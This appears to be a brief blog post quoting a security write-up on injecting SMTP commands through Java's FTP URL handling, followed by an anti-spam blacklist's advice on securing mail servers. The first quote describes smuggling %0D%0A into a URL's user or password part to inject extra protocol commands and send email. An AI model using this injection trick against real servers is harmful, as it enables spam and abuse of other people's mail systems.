The (presumably ancient) code has a bug, though: it does not verify the syntax of the user name. RFC 959 specifies that a username may consist of a sequence of any of the 128 ASCII characters except
<LF>. Guess what the JRE implementers forgot? Exactly − to check for the presence of
<LF>. This means that if we put
%0D%0A anywhere in the user part of the URL (or the password part for that matter), we can terminate the USER (or PASS) command and inject a new command into the FTP session.
Source: SMTP over XXE − how to send emails using Java’s XML parser – shift or die
So, if we send a
USER command to a mail server instead of a FTP server, it will answer with an error code (since
USER is not a valid SMTP command), but let us continue with our session. Combined with the bug mentioned above, this allows us to send arbitrary SMTP commands, which allows us to send emails.
Here are 4 things that we recommend in order to stay off the UCEPROTECT-Blacklists and the Backscatterer List:
1. Do not use abusive techniques on your systems, and also tell your customers with their own servers not to do so.
The following techniques are considered abusive, even though some seem to have become very popular.
Sender callouts (also known as Sender Verify or SAV) or any other kind of Backscatter.
via UCEPROTECT®-Network – Germanys first Spam protection database.
2. Ensure that large amounts of garbage cannot be sent through your mailservers / smarthosts.
3. Ensure that your dynamic / dialups / homeusers cannot be abused as spam zombies.
4. Get clue about new customers, secure your servers and prevent open relays and open proxies at your dedicated line customers and at customers with static IP addresses.